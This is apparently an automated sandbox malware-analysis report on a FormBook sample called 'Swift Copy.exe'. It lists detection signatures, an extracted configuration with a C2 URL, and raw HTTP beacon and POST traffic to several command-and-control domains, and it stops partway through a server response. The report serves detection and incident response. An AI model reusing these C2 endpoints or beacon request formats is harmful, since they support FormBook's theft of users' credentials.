0.2.Swift Copy.exe.34c7188.6.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x47439:$sqlite3step: 68 34 1C 7B E1 0x4756c:$sqlite3step: 68 34 1C 7B E1 0x72459:$sqlite3step: 68 34 1C 7B E1 0x7258c:$sqlite3step: 68 34 1C 7B E1 0x9c479:$sqlite3step: 68 34 1C 7B E1 0x9c5ac:$sqlite3step: 68 34 1C 7B E1 0x4747b:$sqlite3text: 68 38 2A 90 C5 0x475c3:$sqlite3text: 68 38 2A 90 C5 0x7249b:$sqlite3text: 68 38 2A 90 C5 0x725e3:$sqlite3text: 68 38 2A 90 C5 0x9c4bb:$sqlite3text: 68 38 2A 90 C5 0x9c603:$sqlite3text: 68 38 2A 90 C5 0x47492:$sqlite3blob: 68 53 D8 7F 8C 0x475e5:$sqlite3blob: 68 53 D8 7F 8C 0x724b2:$sqlite3blob: 68 53 D8 7F 8C 0x72605:$sqlite3blob: 68 53 D8 7F 8C 0x9c4d2:$sqlite3blob: 68 53 D8 7F 8C 0x9c625:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 3 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Swift Copy.exe	Virustotal: Detection: 21%			Perma Link
Source: Swift Copy.exe	ReversingLabs: Detection: 19%

Yara detected FormBook

Source: Yara match	File source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://www.epic45.co.uk/bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0	Avira URL Cloud: Label: malware
Source: http://www.kinemartigues.com/bwe0/	Avira URL Cloud: Label: malware
Source: http://www.epic45.co.uk/bwe0/	Avira URL Cloud: Label: malware
Source: www.my1245.com/bwe0/	Avira URL Cloud: Label: malware
Source: http://www.mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w==	Avira URL Cloud: Label: malware
Source: http://mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9	Avira URL Cloud: Label: malware
Source: http://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA==	Avira URL Cloud: Label: malware
Source: http://www.mogdento.com/bwe0/	Avira URL Cloud: Label: malware
Source: http://www.blackyaga.xyz/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA==	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe

ReversingLabs: Detection: 19%

Source: 8.0.RegSvcs.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.my1245.com/bwe0/"], "decoy": ["GA8abA96SLI=", "RjM/QAsrNyRPlNEjahNMdKXlPtbXpQ==", "rOQ4ySihIKVFhRnhZxfZ", "iSnyAlGXQBSBwz1C", "SYfcQ54ijGWAuQq1UQTE", "XRcVgsQIO8FVnvCOiHLvE3k=", "K2XLULRJuod6I3dO", "S4oH5i5i3+expw==", "4hZdto3RgCY9esve1k7T5x9YPw==", "fkpgXDuEv2NzvxCcq2AxMnE=", "13czFGvtsco1gf8=", "ub4KhXCsZ/qnnvYTijN3dA==", "WD5IRIcJB51Hfs8grBnldA==", "YqxA1LPudXGKyP1FlQ==", "MZHXMBdZ8Mf2X3ZjSVY=", "7mLLNhchknqdLVbz+6ci4VeD", "66OK6kmRv8N6I3dO", "+97y8jK5vTnIn8crIwyHnRxv03Kp", "PC1PqPJ6573fH0aUnGAxMnE=", "3BFlt4nJcA3Inb3TGO02bq++XzWRMVg=", "JFWj7LK++b1oRUtG", "TbxQMHrFdPd6I3dO", "ltV+Zbop3H8ufAGhzN3O", "mlcxPKADy6TjUdNgnWAxMnE=", "GZlnUCk98Q0sfdIykw==", "ejIKCEuKTCdRrCmEik4Llxxv03Kp", "oBioj+xiThlFleT8Sb2OU6jyDjWRMVg=", "FTiMDEy9JumdFnxiig==", "3F/6yw1VGOkbfvl+wLtBZ+YotQlBMKb8sw==", "gP2ZcmKh5co1gf8=", "QB0tm/t82o5NJ0/hZxfZ", "7p+eEFywCuQDNXv6UOqfYw==", "VT09fVZax5pZOWDL1JH64Ima", "6y+iWKUy3+expw==", "QsByZl2v6YY/IF87hDWDmRtv03Kp", "FMSC3UQG3+expw==", "4iZslO0xz0vUntnn/fX2k6bkRPCE3nhQsQ==", "QALQo+6BigCVFnxiig==", "tGEvL4wVB82JcsmhzN3O", "C3MpKHrHh0hV4B2p4dR3dQ==", "+jBbwhmM9K3ABEXhZxfZ", "Bgtm5ypqp4F6I3dO", "gjAL+kjz7sphJ0zhZxfZ", "XdWUftmHvYF6I3dO", "/72t+jNqjjDTEV4tbVg=", "DogcC2/11HdGqv2BEuHA", "XgwEGD8FXWErZmlI", "i0Ud7r7Ot39AkQrk3Y1frfEsNw==", "ldkwfVSeU9dkhpeknQ==", "Do9QPSpsaYJ6I3dO", "lJCssH2SnGLkU+Y=", "993QLp0nk1yDgZd1rBnldA==", "k8cWkuts5VMbaZ9quHj64Ima", "bF53yjBwIg9H", "BYcZjHa7hWAyFzAQMyg616PYPtbXpQ==", "XFSfGGr2bDP/ebB8x3Izrh5v03Kp", "A8PhVrAswln64jlMWGnQ9pXThRZ8HLyi", "yL3yWzZCyVcmpCbw7q+FFPkIFzWRMVg=", "P8yKVC56enmwYp+HpaPR", "OvT4bdZHwkTRntehzN3O", "re6GEPc19FobfNUkrBnldA==", "3JOU+kudyloQ/zcBR2FgrfEsNw==", "B/cOgMQIHPYjkynCGiG5xbYaGwQ=", "XqQpFlRw8m4bXJt0uZZ12SVNPw=="]}

Source: Swift Copy.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: Swift Copy.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: RegSvcs.pdb, source: NETSTAT.EXE, 00000019.00000002.518155869.0000000003263000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.282733193.0000000001701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.279929661.0000000001565000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.513858373.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.357141735.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.359401565.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.516489080.000000000303F000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.282733193.0000000001701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.279929661.0000000001565000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.513858373.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.357141735.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.359401565.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.516489080.000000000303F000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: NETSTAT.EXE, 00000019.00000002.518155869.0000000003263000.00000004.10000000.00040000.00000000.sdmp

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.92.235.55 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.mogdento.com
Source: C:\Windows\explorer.exe	Network Connect: 103.67.235.120 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.3.130.2 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 85.159.66.93 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.kinemartigues.com
Source: C:\Windows\explorer.exe	Network Connect: 51.159.175.169 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.blackyaga.xyz
Source: C:\Windows\explorer.exe	Domain query: www.epic45.co.uk
Source: C:\Windows\explorer.exe	Domain query: www.expectedclosure.one

Uses netstat to query active network connections and open ports

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE

Performs DNS queries to domains with low reputation

Source: C:\Windows\explorer.exe

DNS query: www.blackyaga.xyz

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.my1245.com/bwe0/

Source: Joe Sandbox View	ASN Name: ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN
Source: Joe Sandbox View	ASN Name: DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU

Source: global traffic	HTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA== HTTP/1.1Host: www.blackyaga.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bwe0/?9rV8zl=z0a7bU3Grk9SZV+rn0o4us/noU2vzWsLY51yg1R10n5VTVON6q0J/IdVbRNrmdil3H/zWNK1GQbVnCycFh7AKivH+ief+xiP+g==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1Host: www.expectedclosure.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA== HTTP/1.1Host: www.kinemartigues.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1Host: www.epic45.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w== HTTP/1.1Host: www.mogdento.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 103.67.235.120 103.67.235.120

Source: global traffic	HTTP traffic detected: POST /bwe0/ HTTP/1.1Host: www.expectedclosure.oneConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.expectedclosure.oneUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.expectedclosure.one/bwe0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 39 72 56 38 7a 6c 3d 7e 32 79 62 59 68 7a 7a 38 51 68 46 58 58 28 4a 67 53 55 6c 6f 2d 48 71 71 46 7a 32 35 55 73 73 50 4a 64 6e 6e 78 4e 52 75 45 56 76 44 41 36 6b 34 49 41 4c 69 64 64 7a 56 52 38 2d 71 61 6e 6a 7a 56 6a 6b 45 76 48 4f 4f 33 6e 49 77 43 79 55 49 42 75 61 44 77 50 31 32 7a 6e 6b 36 69 36 48 34 61 32 52 46 74 70 30 57 46 4f 6a 66 66 79 38 4e 53 70 53 77 79 64 5a 78 55 45 34 31 57 42 39 66 32 47 33 42 79 62 33 7a 6d 34 42 33 63 52 46 44 43 6b 48 6c 38 4d 34 6e 4e 4b 53 39 78 66 6a 30 62 37 4b 4c 50 55 75 75 4a 30 57 41 4e 30 61 6c 6d 38 57 52 63 34 63 77 46 6d 5f 4e 4b 44 32 71 70 59 38 49 37 78 39 28 46 57 30 36 66 63 68 74 42 71 6c 7e 33 49 38 75 6c 52 41 63 31 36 4d 45 6c 76 75 66 4a 68 31 5a 49 62 55 6a 33 6c 36 41 2d 33 6f 33 6c 4b 43 78 41 41 58 33 57 32 33 34 74 48 6a 42 4f 28 5a 7a 38 5a 76 78 4d 51 6f 37 6a 64 59 58 2d 46 6b 54 6e 39 62 69 6f 4b 74 55 68 78 4e 45 55 31 73 66 79 33 5f 52 4d 68 4a 64 51 74 49 59 67 76 52 6c 37 54 37 67 62 69 6e 54 74 7e 38 54 2d 57 62 51 36 74 77 42 48 77 66 71 45 53 50 7a 39 70 31 4a 58 46 4e 34 37 67 33 67 68 7e 4f 47 49 4a 4b 56 42 52 67 30 6b 68 59 33 50 79 37 7e 46 6d 76 66 7a 7a 58 30 57 6b 69 46 68 6e 6c 32 53 45 67 57 71 46 39 6e 46 70 70 39 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 9rV8zl=~2ybYhzz8QhFXX(JgSUlo-HqqFz25UssPJdnnxNRuEVvDA6k4IALiddzVR8-qanjzVjkEvHOO3nIwCyUIBuaDwP12znk6i6H4a2RFtp0WFOjffy8NSpSwydZxUE41WB9f2G3Byb3zm4B3cRFDCkHl8M4nNKS9xfj0b7KLPUuuJ0WAN0alm8WRc4cwFm_NKD2qpY8I7x9(FW06fchtBql~3I8ulRAc16MElvufJh1ZIbUj3l6A-3o3lKCxAAX3W234tHjBO(Zz8ZvxMQo7jdYX-FkTn9bioKtUhxNEU1sfy3_RMhJdQtIYgvRl7T7gbinTt~8T-WbQ6twBHwfqESPz9p1JXFN47g3gh~OGIJKVBRg0khY3Py7~FmvfzzX0WkiFhnl2SEgWqF9nFpp9g).
Source: global traffic	HTTP traffic detected: POST /bwe0/ HTTP/1.1Host: www.kinemartigues.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.kinemartigues.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.kinemartigues.com/bwe0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 39 72 56 38 7a 6c 3d 42 35 56 53 6a 37 71 39 4f 72 72 58 74 30 51 79 4f 33 7e 74 35 48 47 34 67 51 31 49 59 47 6a 41 6b 72 34 67 72 63 6c 73 51 54 5a 79 67 4a 6d 79 43 5a 56 7a 4f 61 65 35 6d 38 72 2d 70 4f 67 62 72 55 73 35 73 78 63 45 71 6a 7a 63 62 49 6a 59 62 75 49 6d 6f 38 36 54 73 4a 73 4e 69 73 59 4d 4d 6a 4b 71 35 66 63 31 77 49 6d 69 59 46 41 31 64 32 6c 75 59 43 73 62 4b 49 57 31 32 2d 4d 51 46 43 6f 7a 64 79 6d 4a 69 37 6e 30 65 58 79 5f 37 5f 38 6a 28 6c 75 66 35 59 31 6d 66 4e 71 6c 56 61 78 45 37 35 63 6a 33 5a 66 61 6f 33 6e 4f 43 30 50 6b 31 57 54 43 28 33 4f 55 42 64 69 65 5a 4a 55 76 4b 6a 65 44 36 41 69 53 6e 43 59 6f 28 46 70 64 39 32 50 7a 6a 7a 51 54 43 64 43 56 63 32 38 74 51 58 67 56 37 52 34 42 71 2d 4b 37 64 4a 5a 76 39 48 6b 31 39 6a 65 35 51 75 34 50 7e 58 64 54 33 56 79 47 48 33 4c 5a 57 45 6c 76 45 65 77 67 44 33 67 6c 35 42 28 73 5a 34 31 47 71 34 7e 39 30 59 6c 33 5a 37 57 51 34 4f 55 67 6b 67 4d 57 67 45 4f 37 4d 48 72 6d 34 72 4d 74 33 38 57 78 53 31 57 56 49 5a 5a 32 38 6d 74 7a 67 45 4f 4d 35 62 5a 62 28 6e 64 61 7a 59 5a 4a 56 78 4c 39 5a 6a 59 4d 4d 41 48 58 47 4b 4b 35 30 6d 37 58 54 74 61 57 63 74 7a 4a 35 52 42 57 71 6c 74 7a 6d 59 62 62 72 43 6d 74 65 62 4a 55 6b 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 9rV8zl=B5VSj7q9OrrXt0QyO3~t5HG4gQ1IYGjAkr4grclsQTZygJmyCZVzOae5m8r-pOgbrUs5sxcEqjzcbIjYbuImo86TsJsNisYMMjKq5fc1wImiYFA1d2luYCsbKIW12-MQFCozdymJi7n0eXy_7_8j(luf5Y1mfNqlVaxE75cj3Zfao3nOC0Pk1WTC(3OUBdieZJUvKjeD6AiSnCYo(Fpd92PzjzQTCdCVc28tQXgV7R4Bq-K7dJZv9Hk19je5Qu4P~XdT3VyGH3LZWElvEewgD3gl5B(sZ41Gq4~90Yl3Z7WQ4OUgkgMWgEO7MHrm4rMt38WxS1WVIZZ28mtzgEOM5bZb(ndazYZJVxL9ZjYMMAHXGKK50m7XTtaWctzJ5RBWqltzmYbbrCmtebJUkA).
Source: global traffic	HTTP traffic detected: POST /bwe0/ HTTP/1.1Host: www.epic45.co.ukConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.epic45.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.epic45.co.uk/bwe0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 39 72 56 38 7a 6c 3d 37 33 46 44 59 52 4b 62 51 55 65 6b 6e 4e 72 35 6d 35 77 70 70 4a 66 6a 4c 6a 65 54 6b 43 74 32 64 71 71 4c 43 68 42 78 62 34 65 36 59 73 33 4f 32 5f 28 78 59 74 54 62 4d 4b 4f 35 7a 42 4d 4b 54 49 63 4d 35 6f 54 4e 39 58 42 31 36 72 58 36 57 7a 41 37 72 66 6b 73 4e 4a 70 74 34 59 78 54 55 6e 39 59 71 34 39 46 4f 42 49 48 46 48 59 74 57 47 62 38 69 5a 4b 46 7e 4e 63 39 41 36 42 6c 39 68 4e 43 76 6d 73 57 75 75 77 50 4e 5a 7e 32 7e 33 39 74 69 42 75 4f 56 36 45 7a 79 69 54 57 59 48 42 4f 42 49 74 6d 6a 5a 4e 68 31 42 47 50 35 49 69 78 6f 65 76 65 63 52 45 53 6e 66 50 43 78 50 5a 4a 72 75 77 78 30 72 6d 68 74 6a 34 75 5a 41 50 46 71 5f 59 6a 61 4b 4b 36 53 71 7e 68 55 46 6e 44 67 37 54 38 41 36 52 2d 77 33 4c 54 57 41 30 52 4b 5a 77 30 31 69 33 4d 72 45 32 35 38 63 46 6d 74 4d 39 5a 35 54 7a 31 41 69 38 4e 45 32 6d 67 36 64 37 65 41 59 46 5f 30 6f 77 64 77 6c 45 51 56 44 51 65 51 4a 78 50 59 2d 61 4e 72 52 36 57 67 62 30 4f 4b 34 37 63 41 72 34 5a 4b 6b 6c 75 6f 63 36 75 36 46 4d 61 62 5a 42 32 74 63 70 49 6f 7a 73 63 75 72 32 43 75 34 46 44 73 77 77 5f 4c 69 48 41 32 66 6e 2d 59 53 7e 64 58 37 32 42 74 37 4d 61 57 67 31 57 67 6d 42 78 77 38 63 31 28 76 66 70 38 4e 69 7a 79 50 53 4a 67 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 9rV8zl=73FDYRKbQUeknNr5m5wppJfjLjeTkCt2dqqLChBxb4e6Ys3O2_(xYtTbMKO5zBMKTIcM5oTN9XB16rX6WzA7rfksNJpt4YxTUn9Yq49FOBIHFHYtWGb8iZKF~Nc9A6Bl9hNCvmsWuuwPNZ~2~39tiBuOV6EzyiTWYHBOBItmjZNh1BGP5IixoevecRESnfPCxPZJruwx0rmhtj4uZAPFq_YjaKK6Sq~hUFnDg7T8A6R-w3LTWA0RKZw01i3MrE258cFmtM9Z5Tz1Ai8NE2mg6d7eAYF_0owdwlEQVDQeQJxPY-aNrR6Wgb0OK47cAr4ZKkluoc6u6FMabZB2tcpIozscur2Cu4FDsww_LiHA2fn-YS~dX72Bt7MaWg1WgmBxw8c1(vfp8NizyPSJgQ).
Source: global traffic	HTTP traffic detected: POST /bwe0/ HTTP/1.1Host: www.mogdento.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.mogdento.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.mogdento.com/bwe0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 39 72 56 38 7a 6c 3d 54 48 56 65 71 57 49 4c 62 30 44 33 79 56 36 4d 38 64 75 30 4f 69 77 5f 64 46 49 30 49 61 53 46 4c 6e 77 7a 28 37 6f 72 6e 33 48 6a 64 75 7a 78 79 7a 47 48 61 41 50 6b 37 77 57 49 47 67 71 37 5a 63 6e 77 56 53 39 2d 71 76 63 72 4f 30 6a 70 67 63 61 54 79 38 56 78 56 37 54 46 72 54 4a 33 35 46 48 49 45 79 68 6f 76 33 65 70 64 76 42 4d 66 39 34 41 79 6a 47 2d 49 52 6f 34 6f 64 59 4f 4b 6f 37 58 74 64 5a 36 6f 74 47 71 30 7a 48 6f 49 74 62 39 6d 78 78 74 4d 51 56 2d 7e 64 75 43 63 78 63 2d 38 36 7a 31 38 4f 53 77 31 4a 6b 6a 4e 32 4b 6b 76 4b 43 76 50 39 34 41 56 79 6a 78 56 38 67 6a 6a 32 30 45 4b 39 41 38 45 50 48 43 71 76 49 4c 62 4d 28 74 62 71 46 6b 42 33 7e 4f 30 49 6b 36 69 73 46 52 62 75 75 78 7e 51 28 62 50 6d 5a 78 78 6c 43 43 70 70 69 5f 7e 4f 4c 77 49 68 4d 67 30 33 28 6e 59 78 32 64 56 31 35 4e 37 66 46 48 77 67 65 4a 68 59 4a 53 28 2d 7e 54 76 35 4f 33 47 4c 46 30 75 51 30 4b 69 49 34 74 48 41 44 55 6f 67 66 33 38 68 6b 41 4c 5f 4d 70 6c 4d 38 53 46 6a 39 45 4a 48 66 4b 6e 38 54 6d 66 31 77 43 63 5f 42 32 5a 71 59 31 59 4a 52 73 33 76 57 58 73 58 5a 41 68 73 4c 62 4c 59 59 33 56 5f 64 36 31 71 56 34 41 66 7e 79 65 6d 57 78 50 69 4d 6e 50 61 43 39 46 61 57 69 57 6c 4b 55 65 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 9rV8zl=THVeqWILb0D3yV6M8du0Oiw_dFI0IaSFLnwz(7orn3HjduzxyzGHaAPk7wWIGgq7ZcnwVS9-qvcrO0jpgcaTy8VxV7TFrTJ35FHIEyhov3epdvBMf94AyjG-IRo4odYOKo7XtdZ6otGq0zHoItb9mxxtMQV-~duCcxc-86z18OSw1JkjN2KkvKCvP94AVyjxV8gjj20EK9A8EPHCqvILbM(tbqFkB3~O0Ik6isFRbuux~Q(bPmZxxlCCppi_~OLwIhMg03(nYx2dV15N7fFHwgeJhYJS(-~Tv5O3GLF0uQ0KiI4tHADUogf38hkAL_MplM8SFj9EJHfKn8Tmf1wCc_B2ZqY1YJRs3vWXsXZAhsLbLYY3V_d61qV4Af~yemWxPiMnPaC9FaWiWlKUew).

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 11 Aug 2022 04:29:41 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 9X-Rate-Limit-Reset: 2022-08-11T04:29:46.0784500Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 11 Aug 2022 04:30:01 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 393Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 65 70 69 63 34 35 2e 63 6f 2e 75 6b 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at epic45.co.uk Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 11 Aug 2022 04:30:03 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 393Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 